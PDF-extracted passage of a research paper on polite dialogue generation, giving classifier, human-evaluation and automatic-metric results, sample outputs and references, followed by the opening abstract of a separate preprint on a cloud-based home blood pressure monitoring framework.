Danescu-Niculescu-Mizil et al. (2013), we use accuracy (i.e., percentage of correctly la- beled messages for binary polite/rude labels) to eval- uate our politeness classifier’s generalization ability. Specifically, we used data from the training set of WIKI, and test on both the test set of WIKI and the entire SE (Stack Exchange) corpus. We used the same train-validation-test split setup (7:1:2) as in Aubakirova and Bansal (2016).14 As shown in Table 1, our LSTM-CNN model improved cross- domain accuracy (while maintaining comparable in- domain accuracy) compared to that of the SVM and CNN models reported in Aubakirova and Bansal (2016). This is similar to how Zhou et al. (2015) also found that a combination of LSTM-RNNs and CNNs is superior to an LSTM-RNN or CNN alone for sentiment classification, likely because the joint model captures both long-distance relationships as well as local windowed filter-based features, and this could make it easier to separate in-domain and out- of-domain properties. We also observe more im- provement on cross-domain accuracy because it has much more space for improvement, as opposed to 14Note that this train/dev/test split is only for verifying the strength of the classification model. The classifier used for the three proposed polite-dialogue models was trained on the en- tire Stanford Politeness Corpus (due to the small amount of politeness-labeled data available). 381 Model PPL PPL@L WER WER@L RNN 27.09 26.67 64.10 64.07 HRED 27.14 26.60 64.10 64.03 HRED-Bidir. 26.81 26.31 63.93 63.91 Seq2seq 25.96 25.85 64.27 64.25 Table 2: PPL, WER results computed on {U1,U2,U3} and PPL@L, WER@L computed on {U3} conditioned on {U1,U2}. Lower is better for all metrics. Top results are boldfaced. in-domain accuracy which is already very close to human performance. The higher accuracy is also important because we need a cross-domain-accurate style classifier so that it can effectively stylize re- sponses in diverse dialogue corpora domains such as MovieTriples. 6.2 Base Dialogue Model Results Next, in Table 2, we show that our starting point, base dialogue model is comparable in quality to a popular, representative previous model of Serban et al. (2016), trained on the same corpora with sim- ilar model architectures. We use their Perplexity (PPL) and Word Error Rate (WER) metrics. In or- der to have a meaningful perplexity (i.e., the prob- ability of regenerating a reference response) com- parison between two language generation models, they should have the same vocabulary set. Since the vocabulary of our politeness dialogue models is a combination of vocabulary sets drawn from the MovieTriples and Stanford Politeness corpora, for fair comparison in this section, we separately train a base Seq2seq model following exactly the vocabu- lary (10,000 most frequent tokens, plus an UNK for the rest) and preprocessing protocols from Serban et al. (2016). We bootstrapped the model with 4 epochs on the SubTle corpus (see Sec. 5.3), and then trained on MovieTriples until there was no improvement on perplexity for the validation set. The comparison for this base model with their hierarchical-encoder HRED models is presented in Table 2. As shown, we get comparable results overall on all metrics, and hence we have a good starting-point dialogue model, to which we add politeness, via the following three approaches. 6.3 Stylistic Dialogue Model Results Primary Human Evaluation Results In this sec- tion, we present our primary human evaluation Politeness Quality Difference Retrieval 3.57 3.15 0.42 Generic-10 3.66 2.99 0.67 Seq2seq 3.11 3.42 0.31 Fusion 3.23 3.05 0.18 LFT 3.63 3.39 0.24 Polite-RL 3.50 3.54 0.04 Table 3: MTurk human evaluation results on politeness level and dialogue quality (as well as the absolute value difference between the two, to show balance) of the Re- trieval Models, Seq2seq and the three proposed genera- tive models (avg. of two annotators is shown here). Top results are boldfaced. (MTurk) results on both politeness level and dia- logue quality (context-relevance) of the generated response, based on two annotators and a 300-sized test sample. Table 3 shows the annotator-average scores for each of these two metrics and their ab- solute difference, based on our Likert scales of 1 to 5 (see Sec. 5.2). We can first see that all three of our stylistic generative models improve on polite- ness compared to the Seq2seq base model. How- ever, the Fusion model’s politeness gain is not sta- tistically significant,15 and moreover it achieves this minor politeness level improvement at the cost of significantly compromising dialogue quality (be- cause its output is half-determined by a standalone politeness-trained LM that ignores context). Next, we see that the LFT model is the most po- lite (stat. significance of p < 0.01 over the Seq2seq model), and also has dialogue quality close (statisti- cally equal) to that of Seq2seq. Our final Polite-RL model wins over Seq2seq on politeness (stat. sig- nificance of p < 0.01) as well as achieves a small improvement in dialogue quality (though not at stat. significance level; but it is stat. significantly bet- ter in quality than Retrieval, Generic-10 and Fu- sion.). Moreover, the politeness levels of the LFT and Polite-RL models are statistically equal. There- fore, both models, with their training depth and mul- titasking trade-offs (see Sec. 4), can produce strong levels of stylistic content, without harming context- relevance. Lastly, we can also see that our two retrieval- based models are both very polite (but not stat. sig- 15We test stat. significance via the bootstrap test (Noreen, 1989; Efron and Tibshirani, 1994) with 100K samples. 382 nificantly better over LFT); and as expected, they both have dialogue quality lower than Seq2seq, Polite-RL and LFT (stat. significance of p < 0.01). They also feature two of the worst balances between average politeness and dialogue quality score. This is the type of sacrifice we want to avoid from im- posing on dialogue quality when building a stylistic dialogue model. For inter-annotator agreement, the Kappa score was 0.35 (fair16) on Dialogue Quality and 0.46 (moderate) on Politeness. If we employ a collapsed- Likert version, where the more ambiguous and ex- treme scores of {1,2} and {4,5} are bucketed to- gether,17 we obtained a Kappa score of 0.42 (mod- erate) on Dialogue Quality and 0.55 (moderate) on Politeness. Human Evaluation Results on 3-way LFT Mod- els We also present results on a 3-way politeness level comparison MTurk study among the Polite- LFT, Neutral-LFT, and Rude-LFT models, i.e., the LFT model with three levels (scores) of scaling the prepended style label, corresponding to polite- ness scores 1.0, 0.5 and 0.0, respectively (Table 4, Continuous-LFT column). The table shows that Polite-LFT is significantly more polite than Neutral- LFT (stat. significance of p < 0.01), and Neutral- LFT is in turn more polite than Rude-LFT (stat. sig- nificance of p < 0.01). For inter-annotator agree- ment on this 3-way LFT study, we get a Kappa of 0.51 (moderate), and 0.61 (substantial) for the collapsed-Likert case. We also experimented earlier with a discrete ver- sion of LFT, where we treated responses in the [0.8,1.0] range as polite, [0.2,0.8] as neutral, and [0.0,0.2] as rude. Instead of scaling a single label embedding with continuous politeness scores (as de- scribed in Section 4.3), we assigned to each response one of these three labels with no scaling, accord- ing to its corresponding politeness bin. The human evaluation scores for that model were 3.52, 3.09 and 2.93, respectively, which features less score differ- ence between neutral and rude (Table 4 Discrete- 16These levels were defined by Landis and Koch (1977); also see https://en.wikipedia.org/wiki/Cohens_kappa 17As discussed in Weijters et al. (2010), James et al. (1984), and https://en.wikipedia.org/wiki/Likert_ scale, the ‘central tendency bias’ makes raters avoid using the two extreme response categories. Continuous-LFT Discrete-LFT Polite 3.70 3.52 Neutral 3.15 3.09 Rude 1.19 2.93 Table 4: MTurk human evaluation results on politeness level of 3 LFT models, for both the continuous and the discrete versions. LFT column). Automatic Metric Evaluation Results As dis- cussed in Sec. 5.2, we also use some automatic eval- uation metrics to complement and verify the MTurk human study results. In Table 5, we present the av- erage politeness classifier and BLEU-4 scores of re- sponses from each model. First, we can see that our politeness classifier agrees reasonably well with the human politeness judgments in Table 3, since both identify the Retrieval-based models and LFT as the most polite, followed by Polite-RL and Fusion in descending order. We quantified this ‘agreement’ concretely, and found high correlation between the six human Politeness scores (Table 3 Politeness col- umn) and the six automatic classifier scores (Ta- ble 5 Politeness Score column): Pearson correla- tion is 0.827 (stat. significance p = 0.0422), and Spearman’s rank-order correlation is 0.9276 (p = 0.0077). Next, for BLEU scores, although these scores (as percentages) are very low (consistent with the observation in Ritter et al. (2011) and Li et al. (2016b)), their relative system-ranking still roughly agrees with that of human judgments — we found reasonably high correlation between human Dia- logue Quality and BLEU (based on the six scores in Table 3 Quality column and Table 5 BLEU-4 col- umn): Pearson correlation is 0.793 (stat. signifi- cance p = 0.0597), and Spearman’s rank-order cor- relation is 0.771 (p = 0.0724). Hence, overall, the automatic metric evaluation again shows that without politeness training, the base dialogue model produces neutral responses on average (0.49 score), while the retrieval-based mod- els and all three proposed generative models im- prove on politeness score. Also, the BLEU scores show, similar to the human study results in Table 3, that among the three proposed models, the Fusion model sacrifices the most dialog quality to become more polite, whereas the LFT and RL models main- 383 Politeness Score BLEU-4 Retrieval 0.88 0.59 Generic-10 0.93 0.03 Seq2seq 0.49 1.05 Fusion 0.61 0.78 LFT 0.72 1.02 Polite-RL 0.61 0.94 Table 5: Automatic metrics: avg. politeness and BLEU-4 scores for the two Retrieval models, Seq2seq and three proposed models. Also, the politeness score of Neutral- LFT and Rude-LFT are 0.48, 0.25, resp. Top results are boldfaced. Target Sequence Score Polite Examples well , thanks . that ’s . i appreciate that . 0.99 〈num〉 , 〈num〉 of them in los angeles . i checked . nice work , though . 0.98 nah . i have curfew . he starts to walk away , then stops . quincy oh , by the way . congratulations . 0.97 thank you , ma’am . um , may i ask what this is regarding ? 0.91 hi , 〈person〉 . how are you ? 0.89 i know . amazing . 0.89 Rude Examples you really should pay more attention to what you read , 〈person〉 . 0.11 they were in a car accident . 0.10 you calling more of your stupid friends again ? ya prick . 0.05 are you a bad boy ? 0.05 then she ’s a liar . 0.04 excuse me , does that flask belong to this man ? 0.03 oh , well , excuse me all to hell . 0.02 Table 6: Analysis of politeness classifier: sampled re- sponses from MovieTriples dialogue corpus (without cherry-picking) and their politeness score. The double line separates polite and rude classified responses. tain comparable quality with improved politeness over the base model (Seq2seq). For the retrieval models, we again see that their politeness levels are better than LFT and RL models, but with a corre- sponding loss in dialogue quality. 7 Analysis 7.1 Analysis of Politeness Classifier We start our analysis by providing qualitative exam- ples of how well our politeness classifier performs on the target sequences from MovieTriples train dataset. This is important to check because the clas- sifier is trained on Wikipedia (Wiki) admin request messages, and while our LSTM-CNN performs bet- Input X: for what ? Y: for forcing me to face my life honestly for the first time . Retrieval X: what ’s the c . w . for ? Generic-10 X: thanks for the answer . S2S X: that ’s not true . Fusion X: i do n’t know . I mean , it ’s just a feeling , but that ’s not what i ’m saying . LFT X: you ’ll be fine . RL X: i wish i could . Input X: no, but i wanted to. Y: are you a total lying , scumsucking pig , 〈person〉 ? Retrieval X: so 〈person〉 , what did it total out at ? Generic-10 X: no problem . S2S X: oh , that ’s ridiculous . Fusion X: well , you ’re not a little funny . LFT X: i do n’t think so , sir . RL X: you ’re hurting me ! Input X: you ’re sweet to say so . Y: pretty song . Retrieval X: is there a song you do n’t know ? Generic-10 X: can you clarify ? S2S X: 〈person〉 , i know . Fusion X: you ’re a good man . LFT X: i love this song . RL X: you sound like a goddess . Input X: i find it hard to believe myself . Y: his lips , unused as they are to such a contortion , twisted and stretched . into a smile . Retrieval X: thank you . and always smile . Generic-10 X: nice . S2S X: how can you be so sure ? Fusion X: you ’re a good man , mr . LFT X: your lips are well . RL X: your lips are so beautiful . Table 7: Output dialogue response examples by Retrieval, Generic-10, Seq2seq (denoted as S2S) and the 3 genera- tive polite models Fusion, LFT, and RL (shows conversa- tion history turns of X and Y, and then the generated 3rd turn response by X). ter on cross-domain Stack Exchange (SE) data, the MovieTriples dialogue corpus is still quite differ- ent and diverse in domain from both Wiki and SE. Hence, it is important to have a reasonably accurate politeness classifier such that it can provide useful labels and rewards for our polite-dialogue models. Table 6 presents some randomly-selected (i.e., non- cherry-picked) responses from MovieTriples and their politeness classifier scores. We can see that the classifier provides a reasonably correct score a majority of the time, capturing several psycholin- guistic politeness strategies mentioned in Danescu- 384 i am sorry i really am sorry , . yes sir i will take care of it . you are a smart looking guy . 0 100 200 3000 100 200 300 0 100 200 3000 2000 100 300 Figure 5: Saliency heatmaps of the classifier’s attention (reward for sampled responses in Polite-RL model). Niculescu-Mizil et al. (2013), e.g., positive ones such as gratitude, deference, greeting, positive lexi- con, indirection, indicative modal, and negative ones such as negative lexicon, direct question, direct start, 2nd person start. However, it does occasionally give strongly polite or rude scores to some mild or neu- tral responses, e.g., “they were in a car accident”, showing scope for classifier improvements. 7.2 Output Examples of Stylistic Dialogue Next, we show some output examples of our polite dialogue models w.r.t. the base Seq2seq model as well as the retrieval-based models. We use these ex- amples to demonstrate the politeness strategies our proposed generative models have learned (in Ta- ble 7). In the first example, our stylistic models use politeness strategies such as indirection, pos- itive lexicon and counterfactual modal (Danescu- Niculescu-Mizil et al., 2013). This example also illustrates the behavior of the Retrieval model, i.e., most of the time it just outputs an utterance that has word overlap with but totally irrelevant to the con- text. Thus although all its retrieved responses have oracle-level fluency and grammaticality, its average dialogue quality score in the human evaluation is still not as good as that of Seq2seq. In the second example, Fusion uses indirection, while LFT is being polite even when disagreeing with the abusive language from Y . This example also shows that Generic-10, due to its limited space for retrieval, oftentimes fails to provide a relevant answer, although it is the most polite one since its candidate responses are manually picked. In the third example, Fusion and LFT both use positive lex- icon, and RL makes a compliment. In the fourth ex- ample, each of the three proposed models uses pos- itive lexicon. It is worth noting that in the last ex- ample, while LFT and Polite-RL seem to provide a relevant compliment, they are actually compliment- ing the wrong person. This kind of issue motivates us toward creating persona-based (Li et al., 2016c) politeness models for future work. 7.3 Visualization of Polite-RL Reward Using derivative saliency (Simonyan et al., 2013; Li et al., 2016a; Aubakirova and Bansal, 2016), we also visualize how much each token in the sampled re- sponse contributes to the classifier’s reward during Polite-RL model’s training. Fig. 5 shows three such heatmaps that correspond to the magnitudes of the derivative in absolute value with respect to each di- mension. The figures clearly show that the classifier has learned to identify multiple politeness strategies, e.g., “smart” (deference), “sir” (polite address), and the two “sorry”s (apologizing). 8 Conclusion and Future Work We first presented three diverse generative mod- els that can generate rich polite-to-rude spectrum dialogue responses (based on the politeness theo- ries by Brown and Levinson (1987)), without us- ing any parallel data (which is usually assumed for tasks such as machine translation) and only relying on a style classifier. Via multiple human evalua- tion studies and automatic metrics, we demonstrated that all three models generate more polite responses (displaying several politeness strategies discussed in previous psycholinguistic works), while LFT and Polite-RL are able to do so without losing dialogue quality, as opposed to the Fusion model as well as the two retrieval-based models. In future work, there is still much room for im- provement on the politeness as well as dialogue quality side, and one could employ more recent, ad- vanced models such as variational, adversarial, and decoder-regulation techniques. Though we focused on politeness for the scope of this paper, our models can be easily generalized to other emotion and personality styles (only relying on a style classifier), hopefully contributing towards the valuable paradigm of human-like and engaging intelligent tutors and personal assistants. In future work, our polite-RL model could also be extended to stylistic task-based dialogue generation, where both content preservation and style transfer are needed, potentially by disentangling politeness and content 385 of the generated response and then only feeding the politeness portion to the classifier for RL training. Acknowledgments We thank the action editor and the anonymous re- viewers for their helpful comments and discussions. This work was supported by DARPA (YFA17- D17AP00022), Facebook ParlAI Research Award, Google Faculty Research Award, Bloomberg Data Science Research Grant, and Nvidia GPU awards. The views, opinions, and/or findings contained in this article are those of the authors and should not be interpreted as representing the official views or policies, either expressed or implied, of the funding agency. References David Ameixa, Luisa Coheur, Pedro Fialho, and Paulo Quaresma. 2014. Luke, I am your father: Dealing with out-of-domain requests by using movies subti- tles. In International Conference on Intelligent Virtual Agents, pages 13–21. Springer. Ron Artstein and Massimo Poesio. 2008. Inter-coder agreement for computational linguistics. Computa- tional Linguistics, 34(4):555–596. Malika Aubakirova and Mohit Bansal. 2016. Interpret- ing neural networks to improve politeness compre- hension. In Proceedings of the 2016 Conference on Empirical Methods in Natural Language Processing, pages 2035–2041. Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Ben- gio. 2015. Neural machine translation by jointly learning to align and translate. In Proceedings of In- ternational Conference on Learning Representations, pages 1–15. Penelope Brown and Stephen C. Levinson. 1987. Polite- ness: Some Universals in Language Usage, volume 4. Cambridge University Press. Michael Buhrmester, Tracy Kwang, and Samuel D. Gosling. 2011. Amazon’s Mechanical Turk: A new source of inexpensive, yet high-quality, data? Per- spectives on Psychological Science, 6(1):3–5. Jacob Cohen. 1968. Weighted Kappa: Nominal scale agreement provision for scaled disagreement or partial credit. Psychological Bulletin, 70(4):213–220. Ronan Collobert, Jason Weston, Léon Bottou, Michael Karlen, Koray Kavukcuoglu, and Pavel Kuksa. 2011. Natural language processing (almost) from scratch. Journal of Machine Learning Research, 12(Aug):2493–2537. Cristian Danescu-Niculescu-Mizil, Moritz Sudhof, Dan Jurafsky, Jure Leskovec, and Christopher Potts. 2013. A computational approach to politeness with appli- cation to social factors. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics, pages 250–259. Daxiang Dong, Hua Wu, Wei He, Dianhai Yu, and Haifeng Wang. 2015. Multi-task learning for multi- ple language translation. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Volume 1: Long Pa- pers), pages 1723–1732. Bradley Efron and Robert J. Tibshirani. 1994. An Intro- duction to the Bootstrap. CRC press. Jessica Ficler and Yoav Goldberg. 2017. Controlling linguistic style aspects in neural language generation. In Proceedings of the Workshop on Stylistic Variation, pages 94–104. Zhenxin Fu, Xiaoye Tan, Nanyun Peng, Dongyan Zhao, and Rui Yan. 2018. Style transfer in text: Exploration and evaluation. In Proceedings of the Thirty-Second AAAI Conference on Artificial Intelligence (AAAI-18), pages 663–670. Michel Galley, Chris Brockett, Alessandro Sordoni, Yangfeng Ji, Michael Auli, Chris Quirk, Margaret Mitchell, Jianfeng Gao, and Bill Dolan. 2015. deltaBLEU: A discriminative metric for generation tasks with intrinsically diverse targets. In Proceed- ings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th Interna- tional Joint Conference on Natural Language Process- ing (Short Papers), pages 445–450. Leon A. Gatys, Alexander S. Ecker, and Matthias Bethge. 2016. Image style transfer using convolutional neu- ral networks. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pages 2414–2423. Sayan Ghosh, Mathieu Chollet, Eugene Laksana, Louis- Philippe Morency, and Stefan Scherer. 2017. Affect- LM: A neural language model for customizable affec- tive text generation. In Proceedings of the 55th Annual Meeting of the Association for Computational Linguis- tics (Volume 1: Long Papers), pages 634–642. Xavier Glorot and Yoshua Bengio. 2010. Understanding the difficulty of training deep feedforward neural net- works. In Proceedings of the International Conference on Artificial Intelligence and Statistics (AISTATS’10). Society for Artificial Intelligence and Statistics, pages 249–256. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation, 9(8):1735– 1780. 386 Zhiting Hu, Zichao Yang, Xiaodan Liang, Ruslan Salakhutdinov, and Eric P. Xing. 2017. Toward controlled generation of text. In Proceedings of the 34th International Conference on Machine Learning, PMLR 70, pages 1587–1596. Lawrence R. James, Robert G. Demaree, and Gerrit Wolf. 1984. Estimating within-group interrater reliability with and without response bias. Journal of Applied Psychology, 69(1):85. Harsh Jhamtani, Varun Gangal, Eduard Hovy, and Eric Nyberg. 2017. Shakespearizing modern language us- ing copy-enriched sequence-to-sequence models. In Proceedings of the Workshop on Stylistic Variation, pages 10–19. Melvin Johnson, Mike Schuster, Quoc V. Le, Maxim Krikun, Yonghui Wu, Zhifeng Chen, Nikhil Thorat, Fernanda Viégas, Martin Wattenberg, Greg Corrado, Macduff Hughes, and Jeffrey Dean. 2017. Google’s multilingual neural machine translation system: En- abling zero-shot translation. Transactions of the Asso- ciation for Computational Linguistics, v. 5, pages 339– 351. Rafal Jozefowicz, Oriol Vinyals, Mike Schuster, Noam Shazeer, and Yonghui Wu. 2016. Exploring the limits of language modeling. CoRR abs/1602.02410. Yuta Kikuchi, Graham Neubig, Ryohei Sasano, Hiroya Takamura, and Manabu Okumura. 2016. Controlling output length in neural encoder-decoders. In Proceed- ings of the 2016 Conference on Empirical Methods in Natural Language Processing, pages 1328–1338. Taeksoo Kim, Moonsu Cha, Hyunsoo Kim, Jungkwon Lee, and Jiwon Kim. 2017. Learning to discover cross-domain relations with generative adversarial net- works. In Proceedings of the 34th International Con- ference on Machine Learning, pages 1857–1865. Diederik Kingma and Jimmy Ba. 2015. Adam: A method for stochastic optimization. In Proceedings of International Conference on Learning Representa- tions. Catherine Kobus, Josep Crego, and Jean Senellart. 2017. Domain control for neural machine translation. In Proceedings of Recent Advances in Natural Language Processing, pages 372–378. J. Richard Landis and Gary G. Koch. 1977. The mea- surement of observer agreement for categorical data. Biometrics, pages 159–174. Jiwei Li, Xinlei Chen, Eduard Hovy, and Dan Jurafsky. 2016a. Visualizing and understanding neural models in NLP. In Proceedings of North American Chapter of the Association for Computational Linguistics-HLT, pages 681–691. Jiwei Li, Michel Galley, Chris Brockett, Jianfeng Gao, and Bill Dolan. 2016b. A diversity-promoting objec- tive function for neural conversation models. In Pro- ceedings of North American Chapter of the Associa- tion for Computational Linguistics-HLT, pages 110– 119. Jiwei Li, Michel Galley, Chris Brockett, Jianfeng Gao, and Bill Dolan. 2016c. A persona-based neural con- versation model. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguis- tics, pages 994–1003. Rensis Likert. 1932. A technique for the measurement of attitudes. Archives of Psychology. Ming-Yu Liu and Oncel Tuzel. 2016. Coupled genera- tive adversarial networks. In Advances in Neural In- formation Processing Systems, pages 469–477. Chia-Wei Liu, Ryan Lowe, Iulian V. Serban, Michael Noseworthy, Laurent Charlin, and Joelle Pineau. 2016. How NOT to evaluate your dialogue system: An empirical study of unsupervised evaluation metrics for dialogue response generation. In Proceedings of the 2016 Conference on Empirical Methods in Natural Language Processing, pages 2122–2132. Ming-Yu Liu, Thomas Breuel, and Jan Kautz. 2017. Unsupervised image-to-image translation networks. In Proceedings of the 2016 Conference on Empiri- cal Methods in Natural Language Processing, pages 2122–2132. Ryan Lowe, Nissan Pow, Iulian V. Serban, and Joelle Pineau. 2015. The Ubuntu Dialogue Corpus: A large dataset for research in unstructured multi-turn di- alogue systems. In Proceedings of the 16th Annual Meeting of the Special Interest Group on Discourse and Dialogue (SIGDIAL 2015), pages 285–294. Ryan Lowe, Michael Noseworthy, Iulian V. Serban, Nicolas Angelard-Gontier, Yoshua Bengio, and Joelle Pineau. 2017. Towards an automatic turing test: Learning to evaluate dialogue responses. In Proceed- ings of the 55th Annual Meeting of the Association for Computational Linguistics, pages 1116–1126. Yi Luan, Chris Brockett, Bill Dolan, Jianfeng Gao, and Michel Galley. 2017. Multi-task learning for speaker- role adaptation in neural conversation models. In Pro- ceedings of the 8th International Joint Conference on Natural Language Processing, pages 605–614. Minh-Thang Luong, Quoc V. Le, Ilya Sutskever, Oriol Vinyals, and Lukasz Kaiser. 2016. Multi-task se- quence to sequence learning. In Proceedings of In- ternational Conference on Learning Representations. François Mairesse and Marilyn Walker. 2007. Person- age: Personality generation for dialogue. In Proceed- ings of the 45th Annual Meeting of the Association of Computational Linguistics, pages 496–503. Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013. Efficient estimation of word representa- 387 tions in vector space. In Proceedings of International Conference on Learning Representations Workshop. Jonas Mueller, David Gifford, and Tommi Jaakkola. 2017. Sequence to better sequence: Continuous revi- sion of combinatorial structures. In International Con- ference on Machine Learning, pages 2536–2544. Eric W. Noreen. 1989. Computer-Intensive Methods for Testing Hypotheses. Wiley New York. Kishore Papineni, Salim Roukos, Todd Ward, and Wei- Jing Zhu. 2002. BLEU: A method for automatic evaluation of machine translation. In Proceedings of the 40th Annual Meeting on Association for Computa- tional Linguistics, pages 311–318. Romain Paulus, Caiming Xiong, and Richard Socher. 2018. A deep reinforced model for abstractive sum- marization. In Proceedings of International Confer- ence on Learning Representations. Juan Ramos. 2003. Using TF-IDF to determine word relevance in document queries. In Proceedings of the First Instructional Conference on Machine Learning, volume 242, pages 133–142. Marc’Aurelio Ranzato, Sumit Chopra, Michael Auli, and Wojciech Zaremba. 2016. Sequence level training with recurrent neural networks. In Proceedings of In- ternational Conference on Learning Representations. Steven J Rennie, Etienne Marcheret, Youssef Mroueh, Jarret Ross, and Vaibhava Goel. 2017. Self-critical sequence training for image captioning. In 2017 IEEE Conference on Computer Vision and Pattern Recogni- tion, page 1197. Alan Ritter, Colin Cherry, and William B. Dolan. 2011. Data-driven response generation in social media. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, pages 583–593. Mike Schuster and Kuldip K Paliwal. 1997. Bidirec- tional recurrent neural networks. IEEE Transactions on Signal Processing, 45(11):2673–2681. Rico Sennrich, Barry Haddow, and Alexandra Birch. 2016a. Controlling politeness in neural machine trans- lation via side constraints. In Proceedings of North American Chapter of the Association for Computa- tional Linguistics, pages 35–40. Rico Sennrich, Barry Haddow, and Alexandra Birch. 2016b. Improving neural machine translation mod- els with monolingual data. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics, pages 86–96. Iulian Vlad Serban, Alessandro Sordoni, Yoshua Bengio, Aaron C. Courville, and Joelle Pineau. 2016. Build- ing end-to-end dialogue systems using generative hier- archical neural network models. In The Thirtieth AAAI Conference on Artificial Intelligence (AAAI-16), pages 3776–3784. Yuanlong Shao, Stephan Gouws, Denny Britz, Anna Goldie, Brian Strope, and Ray Kurzweil. 2017. Gen- erating high-quality and informative conversation re- sponses with sequence-to-sequence models. In Pro- ceedings of the 2017 Conference on Empirical Meth- ods in Natural Language Processing, pages 2210– 2219. Tianxiao Shen, Tao Lei, Regina Barzilay, and Tommi Jaakkola. 2017. Style transfer from non-parallel text by cross-alignment. In Advances in Neural Informa- tion Processing Systems, pages 6833–6844. Karen Simonyan, Andrea Vedaldi, and Andrew Zisser- man. 2013. Deep inside convolutional networks: Visualising image classification models and saliency maps. arXiv preprint arXiv:1312.6034. Georgios P. Spithourakis, Isabelle Augenstein, and Se- bastian Riedel. 2016. Numerically grounded language models for semantic error correction. In Proceedings of the 2016 Conference on Empirical Methods in Nat- ural Language Processing, pages 987–992. Richard S. Sutton, David Mcallester, Satinder Singh, and Yishay Mansour. 2000. Policy gradient methods for reinforcement learning with function approximation. In Advances in Neural Information Processing Sys- tems 12, pages 1057–1063. MIT Press. Yaniv Taigman, Adam Polyak, and Lior Wolf. 2016. Unsupervised cross-domain image generation. arXiv preprint arXiv:1611.02200. Subhashini Venugopalan, Lisa Anne Hendricks, Ray- mond J. Mooney, and Kate Saenko. 2016. Improving LSTM-based video description with linguistic knowl- edge mined from text. In Proceedings of the 2016 Conference on Empirical Methods in Natural Lan- guage Processing, pages 1961–1966. Di Wang, Nebojsa Jojic, Chris Brockett, and Eric Ny- berg. 2017. Steering output style and topic in neural response generation. In Proceedings of the 2017 Con- ference on Empirical Methods in Natural Language Processing, pages 2140–2150. Bert Weijters, Elke Cabooter, and Niels Schillewaert. 2010. The effect of rating scale format on response styles: The number of response categories and re- sponse category labels. International Journal of Re- search in Marketing, 27(3):236–247. Ronald J Williams. 1992. Simple statistical gradient- following algorithms for connectionist reinforcement learning. In Reinforcement Learning, pages 5–32. Springer. Wei Xu, Alan Ritter, Bill Dolan, Ralph Grishman, and Colin Cherry. 2012. Paraphrasing for style. In Proceedings of the 24th International Conference on Computational Linguistics, pages 2899–2914. Hayahide Yamagishi, Shin Kanouchi, Takayuki Sato, and Mamoru Komachi. 2016. Controlling the voice of a 388 sentence in Japanese-to-English neural machine trans- lation. In Proceedings of the 3rd Workshop on Asian Translation (WAT2016), pages 203–210. Zili Yi, Hao Zhang, Ping Tan, and Minglun Gong. 2017. DualGAN: Unsupervised dual learning for image-to- image translation. In Proceedings of International Conference on Computer Vision. Tiancheng Zhao, Ran Zhao, and Maxine Eskenazi. 2017. Learning discourse-level diversity for neural dialog models using conditional variational autoencoders. In Proceedings of the 55th Annual Meeting of the Associ- ation for Computational Linguistics (Volume 1: Long Papers), pages 654–664. Chunting Zhou, Chonglin Sun, Zhiyuan Liu, and Francis Lau. 2015. A C-LSTM neural network for text classi- fication. arXiv preprint arXiv:1511.08630. Jun-Yan Zhu, Taesung Park, Phillip Isola, and Alexei A. Efros. 2017. Unpaired image-to-image translation us- ing cycle-consistent adversarial networks. In Proceed- ings of International Conference on Computer Vision. 389 390 work_75lsf6zn3rhpflwrux7comg6zy ---- HBPF: a Home Blood Pressure Framework with SLA guarantees to follow up hypertensive patients A peer-reviewed version of this preprint was published in PeerJ on 13 June 2016. View the peer-reviewed version (peerj.com/articles/cs-69), which is the preferred citable publication unless you specifically need to cite this preprint. Cuadrado J, Vilaplana J, Mateo J, Solsona F, Solsona S, Rius J, Alves R, Camafort M, Torres G, Betriu A, Gutierrez JM, Fernández E. 2016. HBPF: a Home Blood Pressure Framework with SLA guarantees to follow up hypertensive patients. PeerJ Computer Science 2:e69 https://doi.org/10.7717/peerj-cs.69 https://doi.org/10.7717/peerj-cs.69 https://doi.org/10.7717/peerj-cs.69 HBPF: a Home Blood Pressure Framework with SLA guarantees to follow up hypertensive patients Josep Cuadrado, Jordi Vilaplana, Jordi Mateo, Francesc Solsona, Sara Solsona, Josep Rius, Rui Alves, Miquel Camafort Hypertension or high blood pressure is a condition on the rise. Not only does it affect the elderly but is also increasingly spreading to younger sectors of the population. Treating it involves exhaustive monitoring of patients. A tool adapted to the particular requirements of hypertension can greatly facilitate monitoring and diagnosis. This paper presents HBPF, an efficient cloud-based Home Blood Pressure Framework. This allows hypertensive patients to communicate with their health-care centers, thus facilitating monitoring for both patients and clinicians. HBPF provides a complete, efficient, and cross-platform framework to follow up hypertensive patients with an SLA guarantee. Response time below one second for 80,000 requests and 28% increase in peak throughput going from one to 3 virtual machines were obtained. In addition, a mobile app (BP) for Android and iOS with a user-friendly interface is also provided to facilitate following up hypertensive patients. Among them, between 54% and 87% favorably evaluated the tool. BP can be downloaded for free from the website Hesoft Group repository (http://www.hesoftgroup.eu). PeerJ Preprints | https://doi.org/10.7287/peerj.preprints.2073v1 | CC-BY 4.0 Open Access | rec: 25 May 2016, publ: 25 May 2016 HBPF: a Home Blood Pressure Framework with SLA1 guarantees to follow up hypertensive patients2 Josep Cuadradoa, Jordi Vilaplanab, Jordi Mateob, Francesc Solsonaa,b,1,3 Sara Solsonaa, Josep Riusb, Rui Alvesc, Miquel Camafortd4 aHesoft Group, Partida Bovà, 15, E-25196, Lleida, Spain5 bDepartment of Computer Science & INSPIRES, University of Lleida. Jaume II 69,6 E-25001 Lleida, Spain7 cDepartament of Basic Medical Sciences & IRBLleida, University of Lleida, Avda.8 Alcalde Rovira Roure 80, E-25198 Lleida, Spain.9 dDept. of Internal Medicine, Clinical Institute for Medicine and Dermatology, Hospital10 Cĺınic, Institute of Biomedical Research Agust́ı Pi i Sunyer (IDIBAPS), University of11 Barcelona, Hospital Universitari Villarroel 170, E-08036, Barcelona, Spain.12 Abstract13 Hypertension or high blood pressure is a condition on the rise. Not only14 does it affect the elderly but is also increasingly spreading to younger sectors15 of the population. Treating it involves exhaustive monitoring of patients.16 A tool adapted to the particular requirements of hypertension can greatly17 facilitate monitoring and diagnosis.18 This paper presents HBPF, an efficient cloud-based Home Blood 